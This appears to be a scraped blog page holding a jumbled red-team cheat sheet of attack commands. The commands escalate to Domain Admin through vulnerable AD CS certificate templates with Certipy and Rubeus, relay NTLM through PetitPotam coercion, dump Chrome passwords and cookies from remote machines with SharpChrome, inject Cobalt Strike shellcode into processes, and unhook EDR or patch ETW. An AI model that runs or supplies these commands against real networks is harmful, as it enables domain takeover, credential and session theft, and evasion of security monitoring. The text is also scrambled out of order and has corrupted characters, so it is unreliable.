![]() MalSCCM - Exploiting SCCM servers to deploy malicious applications Ls \\DomainController\c$ -> Verify command was successfully by doing an 'ls' cmd on the DC # Use the output certificate of the DomainAdminAcc account with RubeusĮxecute-assembly C:\Rubeus.exe asktgt /user:DomainAdminAcc /certificate:DomainAdminAcc.pfx /ptt /domain: /dc: > Command will output NTLM hash of target account and the user's certificate Proxychains certipy auth -pfx DomainAdminAcc.pfx -username DomainAdminAcc -domain '' -dc-ip X.X.X.X PFX cert file to reequset a TGT for the DomainAdminAcc user Proxychains certipy req -u -p 'PASSWORD' -dc-ip 10.100.32.200 -ca corp-DC-CA -target ca. -template VulnTemplate -debug -upn Authenticate with the output. # Request a certificate for a vulnerable cert template through proxy Proxychains certipy find -u -p 'PASSWORD' -dc-ip 10.100.32.200 -vulnerable -timeout 30 # Find vulnerable certs with Certipy through proxy # Configure proxychains on Kali/Linux VM to proxy traffic through C2 # First, start a SOCKS proxy in Cobalt Strike (or skip to the next step if you have an on-site Linux VM) SharpWeb - Retrieve saved credentials in Chrome, Firefox and Edge # Cookies can then be imported into Chrome/Firefox using the extension Cookie-EditorĮxecute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk /server: # Dumping and decryptiong Chrome user cookies and sessions on remote machines using the domain backup key (can also use local user password) # Dumping Chrome login passwords on remote machines using the domain backup key (can also use local user password)Įxecute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /server: # Dump Chrome cookies on the local system only for a specific URL - Output in JSON format to import into "Cookie Editor" browser extensionĮxecute-assembly C:\SharpChrome.exe cookies /format:json /browser:chrome /url:".*" # Dump Chrome cookies on the local system for the current userĮxecute-assembly C:\SharpChrome.exe cookies # Dump Chrome logins on the local system for the current userĮxecute-assembly C:\SharpChrome.exe logins /unprotect The code is from Cylance's Universal Unhooking research"Įxploitation DPAPI decryption and extraction on Windows systems "This is a Beacon Object File to refresh DLLs and remove their hooks. # Shellcode injection methods using Windows syscalls with ()Ījpc500/BOFs ETW patch for current processĬobalt Strike's hail-mary unhooking function. # Create shellcode: Cobbalt Strike -> Attacks -> Packages -> Windows Executable (S) -> Output = Raw -> Creates "beacon.bin" file # Inject raw shellcode into an existing process # Spawn a beacon into an existing process Several methods here within Cobalt Strike or using BOFs # Verify asktgt command worked by doing an 'ls' command on the DCĭefense Evasion Shellcode injection techniques # Use Rubeus to request TGT of DC machine account to esclate to Domain AdminĮxecute-assembly C:\Rubeus.exe asktgt /dc: /domain: /user:$ /ptt /certificate: # NTLM relay output will have base64 ticket of target DC machine account # Force coercion via PetitPotam in Cobalt Strike Beacon - Observe "Attack Success!!!" in output if it worked Python3 ntlmrelayx.py -t -smb2support -adcs -template DomainController # Find AD CS web server and verify if web enrollment is enabled by browsing to the URL: `` ![]() NET version of Sherlock.ps1 to look for missing KBs on Windows # Run only miscellaneous-related checks - returns things like Chrome data, logon events, LOBAS, interesting files, downloads, PS events, scheduled tasks, etc.Įxecute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json" # Run only remote-related checks - returns things like network shares, putty sessions, RDP connections/settings, Filezilla, Windows firewall, etc.Įxecute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json" # Run only Chrome checks - returns bookmarks, history, presenceĮxecute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json" # Run only system-related checks - returns things like Antivirus, Applocker, env path/variables, local users/groups, WMI, sysmon, UAC, etc.Įxecute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json" # Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc.Įxecute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json" Execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json" ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |